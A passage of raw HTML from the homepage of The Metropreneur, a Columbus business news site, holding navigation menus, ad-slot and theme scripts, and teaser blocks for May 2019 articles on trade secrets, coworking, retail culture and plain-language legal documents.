href="https://themetropreneur.com/columbus/category/advising/ecdi-spotlight/">ECDI Spotlight</a></li> <li id="menu-item-12108" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12108"><a href="https://themetropreneur.com/columbus/category/advising/ems-marketing-insights/">EMS Marketing Insights</a></li> <li id="menu-item-10460" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10460"><a href="https://themetropreneur.com/columbus/category/advising/experience-columbus/">Experience Columbus</a></li> <li id="menu-item-8945" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8945"><a href="https://themetropreneur.com/columbus/category/advising/metropreneurial-legal-insights/">Legal Insights</a></li> <li id="menu-item-8946" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8946"><a href="https://themetropreneur.com/columbus/category/advising/scaleup-success-special-features/">ScaleUp Success</a></li> <li id="menu-item-8944" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8944"><a href="https://themetropreneur.com/columbus/category/advising/straight-talk/">$traight Talk</a></li> <li id="menu-item-8935" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8935"><a href="/">Archives</a> <ul class="sub-menu"> <li id="menu-item-8929" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8929"><a href="https://themetropreneur.com/columbus/category/advising/archives/capital-access/">Capital Access</a></li> <li id="menu-item-8930" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8930"><a href="https://themetropreneur.com/columbus/category/advising/archives/dollars-and-sense/">Dollars &#038; Sense</a></li> <li id="menu-item-8931" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8931"><a href="https://themetropreneur.com/columbus/category/advising/growth-strategies/">Growth Strategies</a></li> <li id="menu-item-8932" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8932"><a href="https://themetropreneur.com/columbus/category/advising/archives/interactive-strategies/">Interactive Strategies</a></li> <li id="menu-item-8933" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8933"><a href="https://themetropreneur.com/columbus/category/advising/archives/philanthropic-pursuit/">Philanthropic Pursuit</a></li> <li id="menu-item-8928" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8928"><a href="https://themetropreneur.com/columbus/category/advising/archives/systems-for-growth/">Systems for Growth</a></li> <li id="menu-item-8934" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8934"><a href="https://themetropreneur.com/columbus/category/advising/archives/your-digital-business/">Your Digital Business</a></li> </ul> </li> </ul> </li> <li id="menu-item-10012" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10012"><a href="https://themetropreneur.com/columbus/events/">Events</a></li> <li id="menu-item-15848" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15848"><a href="https://themetropreneur.com/columbus/guide-to-coworking-creative-workspaces-in-columbus/">Coworking &#038; Office Guide</a></li> <li id="menu-item-8948" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8948"><a href="https://themetropreneur.com/columbus/submit-your-business/">Submit Your Business</a></li> </ul></div> </div> </div> </div> <div class="td-transition-content-and-menu td-content-wrap"> <!-- Header style 1 --> <div class="td-header-wrap td-header-style-1"> <div class="td-header-top-menu-full"> <div class="td-container td-header-row td-header-top-menu"> <div class="top-bar-style-1"> <div class="td-header-sp-top-menu"> <div class="menu-top-container"><ul id="menu-newspapertop" class="top-header-menu"><li id="menu-item-7788" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-first td-menu-item td-normal-menu menu-item-7788"><a href="http://23.111.159.229/columbus/">Home</a></li> <li id="menu-item-7789" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-7789"><a href="https://themetropreneur.com/columbus/about/">About</a></li> <li id="menu-item-7790" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-7790"><a href="https://themetropreneur.com/columbus/advertise-with-us/">Advertising</a></li> <li id="menu-item-7791" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-7791"><a href="https://themetropreneur.com/columbus/contact-us/">Contact</a></li> </ul></div></div> <div class="td-header-sp-top-widget"> <span class="td-social-icon-wrap"><a target="_blank" href="http://www.facebook.com/pages/The-Metropreneur/108348815867256" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://www.instagram.com/metropreneur/" title="Instagram"><i class="td-icon-font td-icon-instagram"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://www.linkedin.com/company/the-metropreneur" title="Linkedin"><i class="td-icon-font td-icon-linkedin"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="http://twitter.com/metropreneur" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></div> </div> </div> </div> <div class="td-banner-wrap-full td-logo-wrap-full"> <div class="td-container td-header-row td-header-header"> <div class="td-header-sp-logo"> <a itemprop="url" href="https://themetropreneur.com/columbus/"> <img class="td-retina-data" data-retina="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/metro-logo-530x353.png" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/metro-logo-530x353.png" alt=""/> </a> <meta itemprop="name" content="The Metropreneur"> </div> <div class="td-header-sp-recs"> <div class="td-header-rec-wrap"> <div class="td-a-rec td-a-rec-id-header "><!-- Async AdSlot 1 for Ad unit 'Metropreneur_ATF_Leaderboard_Home' ### Size: [[320,50],[728,90]] --> <!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[0]]) --> <div id='div-gpt-ad-8181961-1'> <script> googletag.cmd.push(function() { googletag.display('div-gpt-ad-8181961-1'); }); </script> </div> <!-- End AdSlot 1 --></div> </div> </div> </div> </div> <div class="td-header-menu-wrap-full"> <div class="td-header-menu-wrap td-header-gradient"> <div class="td-container td-header-row td-header-main-menu"> <div id="td-header-menu" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div> <div class="td-main-menu-logo"> <a itemprop="url" href="https://themetropreneur.com/columbus/"> <img class="td-retina-data" data-retina="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/metro-logo-530x353.png" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/metro-logo-530x353.png" alt=""/> </a> <meta itemprop="name" content="The Metropreneur"> </div> <div class="menu-newspaperheader-container"><ul id="menu-newspaperheader-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-8902 current_page_item menu-item-first td-menu-item td-normal-menu menu-item-8909"><a href="https://themetropreneur.com/columbus/">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-8910"><a href="/">Storytelling</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8912"><a href="https://themetropreneur.com/columbus/category/storytelling/business-profiles/">Business Profiles</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8911"><a href="https://themetropreneur.com/columbus/category/storytelling/at-work/">At Work</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-8913"><a href="/">Connecting</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8914"><a href="/columbus/local-resource-database/">Business Resources</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8915"><a href="https://themetropreneur.com/columbus/category/connecting/community-support-features/">Entrepreneurial Support</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8922"><a href="https://themetropreneur.com/columbus/category/connecting/news/upcoming-events/">Upcoming Events</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-8917"><a href="https://themetropreneur.com/columbus/category/connecting/news/">News</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8919"><a href="https://themetropreneur.com/columbus/category/connecting/news/crowdfunding-roundup/">Crowdfunding Roundup</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8920"><a href="https://themetropreneur.com/columbus/category/connecting/news/faqs/">Frequently Asked Questions</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8918"><a href="https://themetropreneur.com/columbus/category/connecting/news/behind-the-scenes/">Behind the Scenes</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8926"><a href="https://themetropreneur.com/columbus/category/connecting/news/weekend-roundup/">Weekend News Roundup</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8923"><a href="https://themetropreneur.com/columbus/category/connecting/news/announcements/">Announcements</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8925"><a href="https://themetropreneur.com/columbus/category/connecting/news/governance/">Governance</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8924"><a href="https://themetropreneur.com/columbus/category/connecting/news/expert-perspective/">Expert Perspective</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8921"><a href="https://themetropreneur.com/columbus/category/connecting/news/event-reviews/">Event Reviews</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-8927"><a href="/">Advising</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-8940"><a href="https://themetropreneur.com/columbus/category/advising/how-to-articles/">How-To Guides</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8938"><a href="https://themetropreneur.com/columbus/category/connecting/news/tips/">Tips of the Trade</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8937"><a href="https://themetropreneur.com/columbus/category/connecting/news/regional-spotlight/">Regional Spotlight</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8939"><a href="https://themetropreneur.com/columbus/category/storytelling/trendspotting/">Trendspotting</a></li> </ul> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8942"><a href="https://themetropreneur.com/columbus/category/advising/cbuzz-podcast/">cbuzz Podcast</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8941"><a href="https://themetropreneur.com/columbus/category/advising/chamber-connection/">Chamber Connection</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8943"><a href="https://themetropreneur.com/columbus/category/advising/ecdi-spotlight/">ECDI Spotlight</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-12108"><a href="https://themetropreneur.com/columbus/category/advising/ems-marketing-insights/">EMS Marketing Insights</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-10460"><a href="https://themetropreneur.com/columbus/category/advising/experience-columbus/">Experience Columbus</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8945"><a href="https://themetropreneur.com/columbus/category/advising/metropreneurial-legal-insights/">Legal Insights</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8946"><a href="https://themetropreneur.com/columbus/category/advising/scaleup-success-special-features/">ScaleUp Success</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8944"><a href="https://themetropreneur.com/columbus/category/advising/straight-talk/">$traight Talk</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-8935"><a href="/">Archives</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8929"><a href="https://themetropreneur.com/columbus/category/advising/archives/capital-access/">Capital Access</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8930"><a href="https://themetropreneur.com/columbus/category/advising/archives/dollars-and-sense/">Dollars &#038; Sense</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8931"><a href="https://themetropreneur.com/columbus/category/advising/growth-strategies/">Growth Strategies</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8932"><a href="https://themetropreneur.com/columbus/category/advising/archives/interactive-strategies/">Interactive Strategies</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8933"><a href="https://themetropreneur.com/columbus/category/advising/archives/philanthropic-pursuit/">Philanthropic Pursuit</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8928"><a href="https://themetropreneur.com/columbus/category/advising/archives/systems-for-growth/">Systems for Growth</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8934"><a href="https://themetropreneur.com/columbus/category/advising/archives/your-digital-business/">Your Digital Business</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-10012"><a href="https://themetropreneur.com/columbus/events/">Events</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-15848"><a href="https://themetropreneur.com/columbus/guide-to-coworking-creative-workspaces-in-columbus/">Coworking &#038; Office Guide</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-8948"><a href="https://themetropreneur.com/columbus/submit-your-business/">Submit Your Business</a></li> </ul></div></div> <div class="td-search-wrapper"> <div id="td-top-search"> <!-- Search --> <div class="header-search-wrap"> <div class="dropdown header-search"> <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a> </div> </div> </div> </div> <div class="header-search-wrap"> <div class="dropdown header-search"> <div class="td-drop-down-search" aria-labelledby="td-header-search-button"> <form role="search" method="get" class="td-search-form" action="https://themetropreneur.com/columbus/"> <div class="td-head-form-search-wrap"> <input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" /> </div> </form> <div id="td-aj-search"></div> </div> </div> </div> </div> </div> </div> </div> <div class="td-main-content-wrap td-main-page-wrap"> <div class="td-container"> <div class="vc_row wpb_row td-pb-row"><div class="wpb_column vc_column_container td-pb-span12"><div class="wpb_wrapper"></div></div></div><div class="vc_row wpb_row td-pb-row"><div class="wpb_column vc_column_container td-pb-span12"><div class="wpb_wrapper"><div class="td_block_wrap td_block_big_grid_3 td_uid_1_5cdd84e964417_rand td-grid-style-1 td-hover-1 td-pb-border-top"><div id=td_uid_1_5cdd84e964417 class="td_block_inner"><div class="td-big-grid-wrapper"> <div class="td_module_mx5 td-animation-stack td-big-grid-post-0 td-big-grid-post td-big-thumb" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-to-keep-trade-secrets/" rel="bookmark" title="Can You Keep a Secret?"><img width="534" height="462" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/BT-May2019-534x462.jpg" alt="" title="Can You Keep a Secret?"/></a></div> <div class="td-meta-info-container"> <div class="td-meta-align"> <div class="td-big-grid-meta"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-to-keep-trade-secrets/" rel="bookmark" title="Can You Keep a Secret?">Can You Keep a Secret?</a></h3> </div> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/mark-vrla/">Mark Vrla</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-16T08:00:50+00:00" >May 16, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> </div> <meta itemprop="author" content = "Mark Vrla"><meta itemprop="datePublished" content="2019-05-16T08:00:50+00:00"><meta itemprop="headline " content="Can You Keep a Secret?"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/BT-May2019.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td-big-grid-scroll"> <div class="td_module_mx11 td-animation-stack td-big-grid-post-1 td-big-grid-post td-medium-thumb" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/cohatch-the-pub-brings-coworking-to-polaris/" rel="bookmark" title="COhatch The Pub Brings Coworking to Polaris"><img width="533" height="261" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/COhatchPub-FeaureSP-533x261.jpg" alt="" title="COhatch The Pub Brings Coworking to Polaris"/></a></div> <div class="td-meta-info-container"> <div class="td-meta-align"> <div class="td-big-grid-meta"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/cohatch-the-pub-brings-coworking-to-polaris/" rel="bookmark" title="COhatch The Pub Brings Coworking to Polaris">COhatch The Pub Brings Coworking to Polaris</a></h3> </div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-13T16:07:55+00:00"><meta itemprop="headline " content="COhatch The Pub Brings Coworking to Polaris"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/COhatchPub-FeaureSP.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx6 td-animation-stack td-big-grid-post-2 td-big-grid-post td-small-thumb" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-dr-peter-edwards-on-savethecrew/" rel="bookmark" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"><img width="265" height="198" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Cbuzz-May19-265x198.jpg" alt="" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"/></a></div> <div class="td-meta-info-container"> <div class="td-meta-align"> <div class="td-big-grid-meta"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-dr-peter-edwards-on-savethecrew/" rel="bookmark" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew">Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew</a></h3> </div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-10T09:12:13+00:00"><meta itemprop="headline " content="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Cbuzz-May19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx6 td-animation-stack td-big-grid-post-3 td-big-grid-post td-small-thumb" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-culture-and-its-influence-on-retail/" rel="bookmark" title="Columbus Culture and its Influence on Retail"><img width="265" height="198" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/ChamberConnection-May19-265x198.jpg" alt="" title="Columbus Culture and its Influence on Retail"/></a></div> <div class="td-meta-info-container"> <div class="td-meta-align"> <div class="td-big-grid-meta"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-culture-and-its-influence-on-retail/" rel="bookmark" title="Columbus Culture and its Influence on Retail">Columbus Culture and its Influence on Retail</a></h3> </div> </div> </div> <meta itemprop="author" content = "Myrissa Stalter"><meta itemprop="datePublished" content="2019-05-09T08:00:46+00:00"><meta itemprop="headline " content="Columbus Culture and its Influence on Retail"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/ChamberConnection-May19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div></div><div class="clearfix"></div></div></div> <!-- ./block --></div></div><div class="wpb_column vc_column_container td-pb-span8"><div class="wpb_wrapper"><script>var block_td_uid_2_5cdd84e9677f3 = new tdBlock(); block_td_uid_2_5cdd84e9677f3.id = "td_uid_2_5cdd84e9677f3"; block_td_uid_2_5cdd84e9677f3.atts = '{"custom_title":"Partner Advice","category_id":"4610","category_ids":"1556,3687,2276,763,805,3862","limit":5,"class":"td_uid_2_5cdd84e9677f3_rand"}'; block_td_uid_2_5cdd84e9677f3.td_column_number = "2"; block_td_uid_2_5cdd84e9677f3.block_type = "td_block_1"; block_td_uid_2_5cdd84e9677f3.post_count = "5"; block_td_uid_2_5cdd84e9677f3.found_posts = "373"; block_td_uid_2_5cdd84e9677f3.header_color = ""; block_td_uid_2_5cdd84e9677f3.ajax_pagination_infinite_stop = ""; block_td_uid_2_5cdd84e9677f3.max_num_pages = "75"; tdBlocksArray.push(block_td_uid_2_5cdd84e9677f3); </script><div class="td_block_wrap td_block_1 td_uid_2_5cdd84e9677f3_rand td-pb-border-top"><h4 class="block-title"><span>Partner Advice</span></h4><div id=td_uid_2_5cdd84e9677f3 class="td_block_inner"> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_4 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-to-keep-trade-secrets/" rel="bookmark" title="Can You Keep a Secret?"><img width="324" height="235" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/BT-May2019-324x235.jpg" alt="" title="Can You Keep a Secret?"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-to-keep-trade-secrets/" rel="bookmark" title="Can You Keep a Secret?">Can You Keep a Secret?</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/mark-vrla/">Mark Vrla</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-16T08:00:50+00:00" >May 16, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> Trade secrets and other confidential information play an important role in the operation of every business. A trade secret is business or... </div> <meta itemprop="author" content = "Mark Vrla"><meta itemprop="datePublished" content="2019-05-16T08:00:50+00:00"><meta itemprop="headline " content="Can You Keep a Secret?"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/BT-May2019.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-dr-peter-edwards-on-savethecrew/" rel="bookmark" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Cbuzz-May19-100x70.jpg" alt="" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-dr-peter-edwards-on-savethecrew/" rel="bookmark" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew">Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-10T09:12:13+00:00" >May 10, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-10T09:12:13+00:00"><meta itemprop="headline " content="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Cbuzz-May19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-culture-and-its-influence-on-retail/" rel="bookmark" title="Columbus Culture and its Influence on Retail"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/ChamberConnection-May19-100x70.jpg" alt="" title="Columbus Culture and its Influence on Retail"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-culture-and-its-influence-on-retail/" rel="bookmark" title="Columbus Culture and its Influence on Retail">Columbus Culture and its Influence on Retail</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-09T08:00:46+00:00" >May 9, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Myrissa Stalter"><meta itemprop="datePublished" content="2019-05-09T08:00:46+00:00"><meta itemprop="headline " content="Columbus Culture and its Influence on Retail"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/ChamberConnection-May19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/ecdi-builds-an-oasis-in-a-food-desert/" rel="bookmark" title="ECDI Builds an Oasis in a Food Desert"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/ECDIspotlight-April19-100x70.jpg" alt="" title="ECDI Builds an Oasis in a Food Desert"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/ecdi-builds-an-oasis-in-a-food-desert/" rel="bookmark" title="ECDI Builds an Oasis in a Food Desert">ECDI Builds an Oasis in a Food Desert</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-25T08:00:40+00:00" >April 25, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "John Newman"><meta itemprop="datePublished" content="2019-04-25T08:00:40+00:00"><meta itemprop="headline " content="ECDI Builds an Oasis in a Food Desert"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/ECDIspotlight-April19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/legal-documents-dont-have-to-be-in-legalese-stick-to-plain-language/" rel="bookmark" title="Legal Documents Don’t Have to be in Legalese: Stick to Plain Language"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/BarnesThornburg-April19-100x70.jpg" alt="" title="Legal Documents Don’t Have to be in Legalese: Stick to Plain Language"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/legal-documents-dont-have-to-be-in-legalese-stick-to-plain-language/" rel="bookmark" title="Legal Documents Don’t Have to be in Legalese: Stick to Plain Language">Legal Documents Don’t Have to be in Legalese: Stick to Plain...</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-04-18T09:20:16+00:00" >April 18, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Doug Oldham"><meta itemprop="datePublished" content="2019-04-18T09:20:16+00:00"><meta itemprop="headline " content="Legal Documents Don’t Have to be in Legalese: Stick to Plain Language"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/04/BarnesThornburg-April19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--></div></div> <!-- ./block --><script>var block_td_uid_3_5cdd84e96a167 = new tdBlock(); block_td_uid_3_5cdd84e96a167.id = "td_uid_3_5cdd84e96a167"; block_td_uid_3_5cdd84e96a167.atts = '{"custom_title":"Storytelling","category_id":"4","limit":"6","class":"td_uid_3_5cdd84e96a167_rand"}'; block_td_uid_3_5cdd84e96a167.td_column_number = "2"; block_td_uid_3_5cdd84e96a167.block_type = "td_block_2"; block_td_uid_3_5cdd84e96a167.post_count = "6"; block_td_uid_3_5cdd84e96a167.found_posts = "574"; block_td_uid_3_5cdd84e96a167.header_color = ""; block_td_uid_3_5cdd84e96a167.ajax_pagination_infinite_stop = ""; block_td_uid_3_5cdd84e96a167.max_num_pages = "96"; tdBlocksArray.push(block_td_uid_3_5cdd84e96a167); </script><div class="td_block_wrap td_block_2 